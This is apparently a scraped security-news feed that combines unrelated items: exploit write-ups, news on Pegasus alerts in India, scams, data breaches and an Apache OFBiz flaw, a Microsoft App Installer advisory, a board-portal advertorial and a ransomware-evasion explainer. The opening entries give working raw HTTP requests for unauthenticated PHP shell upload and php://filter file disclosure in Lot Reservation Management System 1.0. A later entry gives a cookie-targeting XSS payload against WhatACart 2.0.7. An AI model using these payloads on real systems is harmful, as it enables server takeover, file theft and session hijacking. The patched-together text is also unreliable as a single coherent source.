Lot Reservation Management System version 1.0 suffers from a remote shell upload vulnerability.

    # Exploit Title: Lot Reservation Management System Unauthenticated File Upload and Remote Code Execution# Google Dork: N/A# Date: 10th December 2023# Exploit Author: Elijah Mandila Syoyi# Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip# Version: 1.0# Tested on: Microsoft Windows 11 Enterprise and XAMPP 3.3.0# CVE : N/ADeveloper description about application purpose:-------------------------------------------------------------------------------------------------------------------------------------------------------------------AboutThe Lot Reservation Management System is a simple PHP/MySQLi project that will help a certain subdivision, condo, or any business that selling a land property or house and lot. The system will help the said industry or company to provide their possible client information about the property they are selling and at the same time, possible clients can reserve their desired property. The lot reservation system website for the clients has user-friendly functions and the contents that are displayed can be managed dynamically by the management. This system allows management to upload the area map, and by this feature, the system admin or staff will populate the list of lots, house models, or the property that they are selling to allow the possible client to choose the area they want. The map will be divided into each division of the property of building like Phase 1-5 of a certain Subdivision, each of these phases will be encoded individually in the system along with the map image showing the division of each property or lots.------------------------------------------------------------------------------------------------------------------------------------------------------------------Vulnerability:-The application does not properly verify authentication information and file types before files upload. This can allow an attacker to bypass authentication and file checking and upload malicious file to the server. There is an open directory listing where uploaded files are stored, allowing an attacker to open the malicious file in PHP, and will be executed by the server.Proof of Concept:-(HTTP POST Request)POST /lot/admin/ajax.php?action=save_division HTTP/1.1Host: 192.168.150.228User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestContent-Type: multipart/form-data; boundary=---------------------------217984066236596965684247013027Content-Length: 606Origin: http://192.168.150.228Connection: closeReferer: http://192.168.150.228/lot/admin/index.php?page=divisions-----------------------------217984066236596965684247013027Content-Disposition: form-data; name="id"-----------------------------217984066236596965684247013027Content-Disposition: form-data; name="name"sample-----------------------------217984066236596965684247013027Content-Disposition: form-data; name="description"sample-----------------------------217984066236596965684247013027Content-Disposition: form-data; name="img"; filename="phpinfo.php"Content-Type: application/x-php<?php phpinfo() ?>-----------------------------217984066236596965684247013027--Check your uploaded file/shell in "http://192.168.150.228/lot/admin/assets/uploads/maps/". Replace the IP Addresses with the victim IP address.

Lot Reservation Management System 1.0 Shell Upload

Lot Reservation Management System version 1.0 suffers from a file disclosure vulnerability.

    # Exploit Title: Lot Reservation Management System Unauthenticated File Disclosure Vulnerability# Google Dork: N/A# Date: 10th December 2023# Exploit Author: Elijah Mandila Syoyi# Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip# Version: 1.0# Tested on: Microsoft Windows 11 Enterprise and XAMPP 3.3.0# CVE : N/ADeveloper description about application purpose:-------------------------------------------------------------------------------------------------------------------------------------------------------------------AboutThe Lot Reservation Management System is a simple PHP/MySQLi project that will help a certain subdivision, condo, or any business that selling a land property or house and lot. The system will help the said industry or company to provide their possible client information about the property they are selling and at the same time, possible clients can reserve their desired property. The lot reservation system website for the clients has user-friendly functions and the contents that are displayed can be managed dynamically by the management. This system allows management to upload the area map, and by this feature, the system admin or staff will populate the list of lots, house models, or the property that they are selling to allow the possible client to choose the area they want. The map will be divided into each division of the property of building like Phase 1-5 of a certain Subdivision, each of these phases will be encoded individually in the system along with the map image showing the division of each property or lots.------------------------------------------------------------------------------------------------------------------------------------------------------------------Vulnerability:-The application is vulnerable to PHP source code disclosure vulnerability. This can be abused by an attacker to disclose sensitive PHP files within the application and also outside the server root. PHP conversion to base64 filter will be used in this scenario.Proof of Concept:-(HTTP POST Request)GET /lot/index.php?page=php://filter/convert.base64-encode/resource=admin/db_connect HTTP/1.1Host: 192.168.150.228User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeReferer: http://192.168.150.228/lot/Cookie: PHPSESSID=o59sqrufi4171o8bkbmf1aq9snUpgrade-Insecure-Requests: 1The same can be achieved by removing the PHPSESSID cookie as below:-GET /lot/index.php?page=php://filter/convert.base64-encode/resource=admin/db_connect HTTP/1.1Host: 192.168.150.228User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeReferer: http://192.168.150.228/lot/Upgrade-Insecure-Requests: 1The file requested will be returned in base64 format in returned HTTP response.The attack can also be used to traverse directories to return files outside the web root.GET /lot/index.php?page=php://filter/convert.base64-encode/resource=D:\test HTTP/1.1Host: 192.168.150.228User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeReferer: http://192.168.150.228/lot/Upgrade-Insecure-Requests: 1This will return test.php file in the D:\ directory.

Lot Reservation Management System 1.0 File Disclosure

By Waqas
Big Tech vs. Big Brother: Apple Defies India Pressure over iPhone Hacking Alerts.
This is a post from HackRead.com Read the original post: Apple’s iPhone Hack Attack Warnings Spark Political Firestorm in India

Apple warned Indian opposition figures and journalists of possible state-backed hacking last year, causing tension with the government questioning the claims and pressuring Apple to soften them.

In October 2023, Apple sent notifications to some Indian opposition politicians and journalists warning them that their iPhones might be targeted by **state-sponsored attackers**. This triggered a strong reaction from the Indian government, which accused Apple of interfering in the country’s internal affairs and questioned the accuracy of its warnings.

Now, Indian officials, as **reported** by the Washington Post, pressured Apple to soften the language of the notifications and even summoned a company security expert for a meeting in New Delhi. Apple, on the other hand, has maintained that its notifications are based on credible evidence and that it does not attribute hacking attempts to specific governments.

The individuals who received Apple’s hacking warnings and subsequently posted about them on social media shared a common characteristic: they were critical of Prime Minister Modi’s government.

An investigation into the phone of journalist Anand Mangnale, who was examining Modi ally Gautam Adani, revealed the presence of **Pegasus spyware**, developed by the Israeli company **NSO Group**. While Apple did not explicitly attribute the attacks to the Indian government, Pegasus is typically sold to governments and government agencies.

The report further reveals that India’s ruling political party has neither confirmed nor denied the use of Pegasus to spy on journalists and political opponents. However, instances of critics being infected with Pegasus spyware have been previously **reported**, with a 2021 investigation revealing the presence of the spyware on the phones of individuals with a history of opposing and criticizing Modi’s government.

It is worth noting that if and when Apple suspects a user’s iPhone is being targeted by malicious threat actors or by a state-backed cyber attack, the company has a multi-pronged approach to warn the user. This includes threat notifications, security recommendations, email and iMessage alerts.

****1\. Threat Notification:****

1.  This is the most prominent method. A banner and alert appear on the user’s device when they sign in to appleid.apple.com.
2.  The alert clearly states that they “may be targeted by state-sponsored attackers trying to remotely compromise your iPhone.”
3.  It avoids specifying the attacker’s origin but offers general advice on security measures.

****2\. Email and iMessage Notifications:****

1.  Apple sends emails and iMessages to all email addresses and phone numbers associated with the user’s Apple ID.
2.  These notifications mirror the information in the web-based alert, reiterating the potential state-backed attack and suggesting security steps.

****3\. Security Recommendations:****

*   Both the web-based and email/iMessage notifications provide general security advice, such as:
    *   Updating devices to the latest software with security patches.
    *   Enabling two-factor authentication for Apple ID and other critical accounts.
    *   Reviewing iCloud settings and disabling access to non-essential apps.
    *   Changing passwords for important accounts.

It is also important to note that Apple doesn’t share specific details about the attackers or the attack methods to protect their sources and investigations. These notifications are triggered by specific indicators observed by Apple, but not all targeted users may receive one. Receiving a notification doesn’t necessarily mean your iPhone is compromised, but it’s a cautionary flag to take serious security measures.

****Hack alert vs. Apple lockdown mode****

It is also important to differentiate that while threat notifications alert users of cyberattacks, **Apple Lockdown mode** goes one step further by providing extreme protection against sophisticated digital threats by restricting certain functionalities like FaceTime, web browsing, and message attachments.

The Lockdown mode is also Primarily for individuals facing confirmed or imminent high-level cyber threats, such as journalists, activists, or dissidents. Nevertheless, the alleged involvement of Indian authorities in pressuring Apple to downplay the political impact of its hacking warnings, particularly targeting individuals critical of the Modi government.

The use of Pegasus spyware, known for its association with governments and government agencies, also raises concerns about potential state-sponsored surveillance of journalists and political opponents in India and elsewhere.

****_RELATED ARTICLES_****

1.  **QuaDream: Israeli Cyber Mercenary Behind iPhone Hacks**
2.  **Android Version of Sophisticated Pegasus Spyware Discovered**
3.  **iPhones of 9 State Dept officials hijacked by NSO Pegasus spyware**
4.  **Did Saudi Crown Prince use Israeli spyware to hack Jeff Bezos’s iPhone?**
5.  **iPhones of 36 Al Jazeera journalists hacked with NSO’s zero-click spyware**

Apple’s iPhone Hack Attack Warnings Spark Political Firestorm in India

Online scams abound every day, but these four scams from 2023 were particularly devious.

In 2023, the public primarily confronted two varieties of online scams: the technical and the topical.

Technical scams abuse legitimate aspects of modern internet infrastructure to lead users to illegitimate or compromised sites. A team of hackers can, say, boost their own info-stealing websites through Google search results, providing a veneer of authenticity to their malicious intent. These scams can involve vast criminal segmentation and coordination between malware developers, code writers, and hackers who sometimes also infect legitimate websites with dangerous tools.

Topical scams, on the other hand, are simpler. By leveraging major news events or luring users with too-good-to-be-true deals, cybercriminals trick victims into giving away their vital credit card information through cyberspace.

Both are dangerous, both are effective, and both had their fair share of sneaky examples this year.

With your holiday shopping over (or, we hope it’s over, as it’s a bit late now for gifts), we at Malwarebytes Labs wanted to look back on four of the sneakiest online scams we saw last year.

****Forged in fire, fraud on Facebook****

In November, an insulated tumbler made by the drinkware company Stanley allegedly survived a roaring fire that sadly destroyed a woman’s car. The car owner, Danielle Marie Lettering, posted a video on TikTok that showed a Stanley tumbler—merely singed—inside a wrecked Kia.

“Everybody is so concerned if the Stanley spills but what else,” Lettering said in the video she posted. “It was in a fire yesterday and it still has ice in it.”

Lettering’s TikTok video has more than 90 million views and a wealth of comments about first-time interest in Stanley’s products.

And right on time, just weeks later, Malwarebytes Labs spotted a fraudulent Facebook ad—posing as a legitimate sale from Dick’s Sporting Goods—selling the now-storied Stanley Quencher cup for just $19, a steal compared to Amazon listings near $45.

Users who clicked on the ad were not taken to the legitimate website for Dick’s Sporting Goods, but instead routed to a website where the payment processor was registered in Hong Kong.

Sprung just before Black Friday, this scam had it all—the urgency of an annual mega-shopping event, the name of a recognized and trusted online retailer, and the allure of a once-benign product now launched into viral celebrity.

****WoofLocker sends victims into a redirection labyrinth****

Tech support scams often follow a similar plot: Cybercriminals will place malicious ads online that label a bogus phone number for everyday users who are experiencing common tech problems. When those users look up their tech troubles online, they’ll see results that display the scammers’ phone number, fooling them into calling what they think is a legitimate helpline, only to be led through a series of social engineering tricks to eventually hand over their money.

But the tech support scam held up by “Wooflocker” is different.

Wooflocker does not rely on malicious advertising (also known as malvertising). Wooflocker only ensnares victims who, of their own accord, visit any of several compromised websites.

With every visit to a compromised website, a user is surreptitiously “fingerprinted”—if their IP address, computer environment, and cyber-defenses (or lack thereof) are all preferable to the hackers behind Wooflocker, then those website visitors are redirected to another domain with a URL that is created then and there by Wooflocker’s hacking scripts.

Malwarebytes Labs first spotted Wooflocker in 2020, and even then, we learned that the cybercriminals behind it had likely been building out their web traffic redirection machine since 2017. But in the years since we last checked in, Wooflocker has become more sophisticated. The current iteration of Wooflocker now relies on web hosting services in Bulgaria and Ukraine, which could potentially provide added protection against any takedown efforts.

****The “logout king”** gets pinned**

In March, the reporting outlet ProPublica revealed that, after months of investigation, it had likely tracked down one of the most notorious online scammers—the self-proclaimed “log-out king,” also known as OBN Brandon.

OBN Brandon’s trick is almost always the same. He reports accounts of growing Instagram influencers to the customer service department of Meta, the company formerly known as Facebook, which also owns Instagram. Once he wrongfully enacts a ban on the account, OBN Brandon reaches out to the person behind the account and says he can bring it back—for a price.

As to _how_ OBN Brandon convinces Meta’s customer support to take down an account, there are multiple tactics. According to ProPublica:

“In some cases OBN hacks into accounts to post offensive content. In others, he creates duplicate accounts in his targets’ names, then reports the original accounts as imposters so they’ll be barred for violating Meta’s ban on account impersonation. In addition, OBN has posed as a Meta employee to persuade at least one target to pay him to restore her account.”

Once a simple image-sharing tool, Instagram has now ballooned into a business platform for countless influencers who take promotional offers from larger companies to be featured in posts and Reels—which are short-form videos on the app. Similarly, many small businesses and entrepreneurs use the platform to self-promote and connect users to their products and services.

One OBN victim that ProPublica spoke to claimed that, before his account was targeted, he had been making between $15,000 and $20,000 a month simply from his Instagram account.

“People pay me all the time to post promos for music, crypto,” the individual told ProPublica. “I can make five, 10 grand by accident if I needed to. … The money’s crazy.”

In its investigation, ProPublica identified a 20-year-old Nevada man as a likely operator or affiliate behind OBN Brandon. Once the outlet gave more details to Meta, Meta sent a cease-and-desist order to the man, also banning him from the platform.

****In their villain era****

For years, Taylor Swift fans were starving.

Not since 2018 had the most recent TIME Person of the Year produced a full-fledged world circuit tour. But in 2023, that changed, when Swift began her “Eras” tour, a globe-spanning celebration of her past albums that, on stage, delighted audiences for three-and-a-half hours every night, no matter the weather.

Still in production, Swift’s “Eras” tour has already brought in literal billions for the pop star goddess, according to one Washington Post estimate.

But the tour has also brought in a significant payday for ticket scammers.

In June, just a few months into the start of the “Eras” tour, Attorney General Dana Nessel for the state of Michigan issued a warning to Swift fans in her state.

“Michigan residents who are defrauded by online ticket scammers should not just shake it off,” said Nessel. “We know these scams all too well. If you believe you were taken advantage of, filing a complaint with my office is better than revenge.”

According to Malwarebytes Labs’ own reporting at the time, scams that preyed on the Eras tour were popping up all across the United States:

“Other locations for the tour are trying to get ahead of the scam curve, issuing their own warnings ahead of events where possible. For example, Cincinnati has highlighted tales of woe related to fake ticket sales on Facebook. Detroit flagged fake ticket sales on Instagram. CBC covered multiple fake sale attempts cheating folks in Canada out of significant chunks of money. Elsewhere, teens have lost out on $1,200 thanks to Craigslist scammers.”

With many, many, many more shows scheduled (the latest of which is in December 2024), stay alert.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 4 sneaky scams from 2023 

Summary In recent months, Microsoft Threat Intelligence has observed threat actors leveraging social engineering and phishing techniques to target Windows OS users and utilizing the ms-appinstaller URI scheme. We have addressed and mitigated this malicious activity by turning off ms-appinstaller by default. Additionally, Microsoft has coordinated with Certificate Authorities to revoke the abused code signing certificates utilized by malware samples we have identified.

**Summary**

In recent months, Microsoft Threat Intelligence has observed threat actors leveraging social engineering and phishing techniques to target Windows OS users and utilizing the ms-appinstaller URI scheme. We have addressed and mitigated this malicious activity by turning off ms-appinstaller by default. Additionally, Microsoft has coordinated with Certificate Authorities to revoke the abused code signing certificates utilized by malware samples we have identified.

Upon detection of this attack vector, Microsoft launched an investigation to ensure proper detections existed within Microsoft Defender for Endpoint and Microsoft Defender for Office to protect our customers.

**Background**

Microsoft initially introduced the ms-appinstaller URI scheme handler in App Installer v1.0.12271.0 to improve the installation experience for MSIX and MSIXBundles.

Recently, malicious activity was observed where bad actors are now using the ms-appinstaller URI scheme handler to trick users into installing malicious software. We highly recommend customers do not install apps from unknown websites.

**Mitigations**

On December 28th, 2023, Microsoft updated CVE-2021-43890 to disable ms-appinstaller URI scheme (protocol) by default, as a security response to protect customers from attackers’ evolving techniques against previous safeguards. This means that users will no longer be able to install an app directly from a web page using the MSIX package installer. Instead, users will be required to download the MSIX package first in order to install it, which ensures that locally installed antivirus protections will run.

We will continue to monitor future malicious activity and make ongoing improvements to prevent fraud, phishing, and a range of other persistent threats. Microsoft will remain vigilant as attackers continue evolving their techniques. Please refer to the Microsoft Threat Intelligence Blog: Financially motivated threat actors misusing App Installer for additional details and guidance.

**To address this issue**

1.  Microsoft has disabled the ms-appinstaller URI scheme handler by default in App Installer version 1.21.3421.0 or higher and if you have not specifically enabled the **EnableMSAppInstallerProtocol**, no further action is needed.
    
    *   Customers can check which version of App Installer is installed on their system by running the following PowerShell command: (Get-AppxPackage Microsoft.DesktopAppInstaller).Version
    *   For information on how to update your App Installer, see Install and update the App Installer.

**How to determine whether you may be at risk**

1.  The **EnableMSAppInstallerProtocol** group policy is set to “Not Configured” (blank) or “Enabled”
    
2.  The version of App Installer installed on your PC is between **v1.18.2691** and **v1.21.3421**
    
3.  Windows OS updates listed below between October 2022 and March 2023 contained a previous (vulnerable) version of the AppInstaller.
    
    *   March 21, 2023—KB5023773 (OS Builds 19042.2788, 19044.2788, and 19045.2788) Preview - Microsoft Support
        
    *   July 11, 2023—KB5028171 (OS Build 20348.1850) - Microsoft Support
        
    *   March 28, 2023—KB5023774 (OS Build 22000.1761) Preview - Microsoft Support
        
    *   October 25, 2022—KB5018496 (OS Build 22621.755) Preview - Microsoft Support
        
    *   Also, customers using builds **v1.22.3452-preview or lower** also contained vulnerable versions of AppInstaller.
        

Note: (not recommended) Customers that must use the ms-appinstaller protocol can still use the App Installer by setting the Group Policy **EnableMSAppInstallerProtocol** to **Disabled**. See Policy CSP – DesktopAppInstaller for additional information.

**References**

*   Installing Windows 10 apps from a web page - MSIX | Microsoft Learn
*   CVE Link
*   Financially motivated threat actors misusing App Installer

Microsoft addresses App Installer abuse

By Owais Sultan
Meetings without paper have become a reality thanks to advanced technologies. Digital tools help companies be more efficient…
This is a post from HackRead.com Read the original post: Why Virtual Board Portals are the Key to Better Collaboration and Decision-Making

Meetings without paper have become a reality thanks to advanced technologies. **Digital tools** help companies be more efficient while staying focused on their daily routine. Instead of traditional table books and paper documents, all the necessary board materials are stored and accessible via a secure digital platform, known as table management software. 

**What are paperless council meetings? **

A digital meeting refers to a business gathering conducted electronically, eliminating the need for traditional paper documents. In such meetings, organizers can instantly access, examine, and annotate meeting materials, agendas, and presentations on their electronic devices.

Embracing paperless council meetings contributes to sustainability by reducing paper waste and diminishing the energy consumption linked to printing, storing, and distributing physical documents. Additionally, the shift to **paperless board meetings** boosts the overall efficiency of meeting processes and cultivates enhanced communication among directors. 

****Why should you enhance Collaboration and Decision-Making with Virtual Board Portals?****

Here are the top 7 reasons to switch to paperless meeting software: 

****Save time for board members****

One of the greatest advantages of **smart board** software is that directors can use it to exchange relevant updates and documents and study them to prepare for a board meeting.

Then, once the event starts, they can go directly to conversation and decision-making. No endless updates, no boring reports. Only collaboration and fruitful discussions. 

The management of the board of directors is impossible without good budget management. As we’ve mentioned before, traditional meetings can be rather expensive. If you consider board software pricing, you will at least reduce the expenses related to printing all those paper copies that directors need to discuss.

If you decide to organize a virtual event, expenses will decrease considerably because you will not have to cover the travel of directors. Instead of paying for office space, accommodation, and travel, you will only have to support a paperless board meeting solution. 

****Improve the efficiency of board meetings****

The simple fact that the boards of directors do not need to go through updates at the beginning of the meeting already means that they will not be tired before they start discussing. Therefore, they can think clearly because they are not tired of listening to reports.

In addition, advice portals allow directors to create meeting agendas so that everyone can propose ideas before they take place. The paperless meeting solution provides members with different tools such as votes and polls that can improve the decision-making process. 

****Improve collaboration between board members and employees.****

Most consulting portal providers allow users to integrate this software with other business tools. According to the **knowa board portal overview**, this makes it easy to connect the consulting portal to the applications that employees use to synchronize the flow of undocumented documents and thus control the progress of tasks.

According to Nicholas Cooper – CEO of board-rooms.co.uk: “Moving to paperless meetings with this software creates a fluid and centralized workspace for managers, allowing them to stay in touch with employees even without office space”.

****Make access to information easy****

The paperless meeting management software can be accessed from any device and location, as long as a user has an Internet connection. This means that directors will not encounter delays or problems simply because they cannot receive a printed document. All the information downloaded from the digital board meeting portal is easy to access and members can study it even on the go.

****Protect company data****

**Data leaks are not a joke**. They are expensive and can to the company’s reputation once customers have realized that their sensitive data has been exposed. It is therefore crucial for a company to protect its information, and the board portal solution is perfect for this. This software allows you to hold paperless board meetings while keeping company documents reliably protected.

Criminals can’t access a board of directors portal because suppliers secure their servers and their customers’ repositories by **encryption**. For the benefit of board members and better protection, administrators can use additional security features such as two-factor authentication.

****Make your advice flexible****

Are the directors of your board located in different countries? Is anyone currently on a business trip? No problem, you can move on to paperless meetings by simply organizing the online event using videoconferencing software and a board portal.

Technology enables us to be flexible and focus less on office space. Take advantage of this opportunity to hold a virtual board meeting, even if some participants cannot physically attend.

****Conclusion****

Board meetings are electronic meetings of board directors, also known as paperless board meetings. During paperless meetings, directors can access, review, and annotate documents, agendas, and presentations in real-time using an Internet connection and their electronic devices.

Organizing paperless board meetings improves the efficiency of meetings and communication between leaders. It is one of the most efficient methods for Better Collaboration and Decision-Making.

****_RELATED ARTICLES_****

1.  **Maximizing Roi With The Best LMS For Elearning**
2.  **Technology and Software Redefine Business Operations**
3.  **Using GenAI in Your Business? Here Is What You Need To Know**
4.  **Learning Management System: What is it and Why do you need it?**
5.  **Top learning management system (LMS) software for small businesses**

Why Virtual Board Portals are the Key to Better Collaboration and Decision-Making

By Waqas
The company under criticism is National Amusements, the parent company of media giants such as Paramount and CBS.
This is a post from HackRead.com Read the original post: National Amusements Reveals Data Breach Amid Backlash Affecting 82,000+

Paramount and CBS’s parent company, National Amusements, took months to reveal the data breach that has impacted more than 82,000 people, including customers and potentially employees as well.

National Amusements, the parent company holding a controlling stake in entertainment giants Paramount, CBS, and numerous theatres across the United States, has come under scrutiny for delaying the disclosure of a major data breach that occurred late last year. The breach impacted 82,128 individuals, comprising both customers and potentially National Amusements employees.

The breach, which went unnoticed for months, was finally reported to the Maine Attorney General. According to the company’s statement, an “unauthorized individual” accessed the company network on December 13, 2022. However, National Amusements only became aware of the intrusion two days later.

Regarding the data affected in the breach, it includes information like name or other personal identifiers combined with financial account number or credit/debit card number (along with the security code, access code, password, or PIN for the account).

The data breach notification was submitted to the Maine Attorney General.

The company enlisted the services of a third-party firm to investigate the breach, a process that concluded “recently.” Curiously, the data breach was only officially acknowledged on August 23 of this year, possibly aligning with the completion of the external investigation.

Despite attempts from the media to seek clarification from National Amusements, the company has maintained near-radio silence, leaving questions about the delayed disclosure unanswered.

Currently, the company asserts that there have been no reports of stolen data being exploited by third parties or leaked online. Nevertheless, National Amusements has proactively taken measures to mitigate the aftermath, providing those affected with complimentary credit monitoring services through Experian for varying durations.

If you’re an employee of National Amusements or one of its customers, be cautious about phishing emails. Cybercriminals might impersonate the company to discuss the recent data breach, but their real intention could be to gather additional information, including your financial details. Stay vigilant and verify the legitimacy of any communication you receive related to the incident.

****_RELATED ARTICLES_****

1.  **OurMine hackers hack Marvel and Netflix Twitter accounts**
2.  **Best legal, free online streaming sites for movies, TV shows**
3.  **Hackers Leak First 8 Episodes of Steve Harvey’s “Funderdome”**
4.  **Soap2day Shuts Down Permanently – Free Legal, Paid Alternatives**
5.  **Potential 500GB Nickelodeon Leak: Unreleased Shows, Scripts at Risk**

National Amusements Reveals Data Breach Amid Backlash Affecting 82,000+

A new zero-day security flaw has been discovered in the Apache OfBiz, an open-source Enterprise Resource Planning (ERP) system that could be exploited to bypass authentication protections.
The vulnerability, tracked as CVE-2023-51467, resides in the login functionality and is the result of an incomplete patch for another critical vulnerability (CVE-2023-49070, CVSS score: 9.8) that was

A new zero-day security flaw has been discovered in the Apache OfBiz, an open-source Enterprise Resource Planning (ERP) system that could be exploited to bypass authentication protections.

The vulnerability, tracked as **CVE-2023-51467**, resides in the login functionality and is the result of an incomplete patch for another critical vulnerability (CVE-2023-49070, CVSS score: 9.8) that was released earlier this month.

"The security measures taken to patch CVE-2023-49070 left the root issue intact and therefore the authentication bypass was still present," the SonicWall Capture Labs threat research team, which discovered the bug, said in a statement shared with The Hacker News.

CVE-2023-49070 refers to a pre-authenticated remote code execution flaw impacting versions prior to 18.12.10 that, when successfully exploited, could allow threat actors to gain full control over the server and siphon sensitive data. It is caused due to a deprecated XML-RPC component within Apache OFBiz.

According to SonicWall, CVE-2023-51467 could be triggered using empty and invalid USERNAME and PASSWORD parameters in an HTTP request to return an authentication success message, effectively circumventing the protection and enabling a threat actor to access otherwise unauthorized internal resources.

The attack hinges on the fact that the parameter "requirePasswordChange" is set to "Y" (i.e., yes) in the URL, causing the authentication to be trivially bypassed regardless of the values passed in the username and password fields.

"The vulnerability allows attackers to bypass authentication to achieve a simple Server-Side Request Forgery (SSRF)," according to a description of the flaw on the NIST National Vulnerability Database (NVD).

Users who rely on Apache OFbiz to update to version 18.12.11 or later as soon as possible to mitigate any potential threats.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Critical Zero-Day in Apache OfBiz ERP System Exposes Businesses to Attack

WhatACart version 2.0.7 suffers from a cross site scripting vulnerability.

Change Mirror Download

    # Exploit Title: WhatACart Version: 2.0.7 - Reflected XSS# Date: 2023-12-27# Exploit Author: tmrswrr# Category : Webapps# Vendor Homepage: https://whatacart.com# Version: 2.0.7# Tested on: https://whatacart.com/demo1 ) Go to this page : https://demo.whatacart.com/2 ) Write search field this payload : <sVg/onLy=1 onLoaD=confirm(1)//3 ) You will bee alert button : https://demo.whatacart.com/site/default/search?keyword=%3CsVg%2FonLy%3D1+onLoaD%3Dconfirm(document.cookie)%2F%2F&navsearch=

WhatACart 2.0.7 Cross Site Scripting

We look at the three most common methods that ransomware groups use to avoid being detected.

An often heard remark is that when your security solution notices a ransomware attack, it’s already too late. There’s a lot of truth in that, if you consider the encryption process to be the ransomware attack. However, these days encryption is just a part of many ransomware attacks.

Some of the cybercriminals we conveniently call ransomware groups have even completely stopped using the encryption process because it’s too “noisy.” Any AI based solution that is worth the electrons used to create it, will notice the activities on a system associated with encryption and the deletion of backups.

In the first days of ransomware, the cybercriminals sent you an email, hoping you would open an attachment or click a link to infect your system with malware. But malware has only a short time-span during which it can hope to stay undetected. Widespread malware is usually just one update away from detection.

So, to hide their presence, many of these gangs have resorted to a lot more silent operations. Consider this typical attack flow:

1.  Initial access is gained by exploiting vulnerabilities on software or hardware found in the target’s environment.
2.  With valid credentials gained by the vulnerability exploitation, phishing, or password attacks, the criminals get access to an internet exposed service, where they can set up some foothold to provide them with command and control options.
3.  From here they can start lateral movement across the target’s network and find ways to raise their permissions.
4.  The next step is often called data exfiltration, which is nothing more than copying interesting looking files to a location under their control where the criminals can have a good look at them.

As you can see, there was no malware involved in these steps. Every single step can be done by using software that is already present. The lateral movement is often done by deploying built-in tools like PowerShell, PsExec, or Windows Management Instrumentation (WMI).

We call this technique Living-off-the-Land (LOTL). LOTL attacks are performed by mimicking normal behavior, and make it extremely difficult for IT teams and security solutions to detect any signs of malicious activity.

Another way to avoid being detected is using fileless malware. Fileless malware is intended to be memory resident only, ideally leaving no trace after its execution. So, the malicious payload exists only in the computer’s memory, which means nothing is ever written directly to the hard drive. As a rule, if malware authors can’t avoid detection by security vendors, they at least want to delay it for as long as possible. This made fileless malware a step forward in the arms race between malware and security products.

Another, very different method to avoid detection is to disable the resident security software before the actual attack is launched. One way to achieve this, which we have seen this year, is by using signed drivers. The drivers can be deployed only when the attacker has already gained administrative privileges on compromised systems. Drivers are loaded early in the boot process of a system and can therefore interfere with subsequently loaded programs.

The most common type of attacks that uses drivers is the “bring your own vulnerable driver” (BYOVD) approach, in which the attackers use a driver from a legitimate software publisher that has known and exploitable security vulnerabilities. Since the driver is legitimate, it will bypass security checks and allow the attacker to then exploit it once it has been installed on the system.

However, there’s also been abuse of several developer program accounts engaged in submitting malicious drivers to obtain a Microsoft signature. Signatures from a trustworthy software publisher make it more likely the driver will get into Windows without interference from the security software.

Many anti-malware solutions, including Malwarebytes, have anti-tampering protection in place, so finding methods to disable the protection is a big deal for malware authors.

Finding signs of malicious activity that are designed to stay under the radar is a job for specialists, which is why many organizations are looking for Managed Detection & Response (MDR) services.

Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

Tag

#auth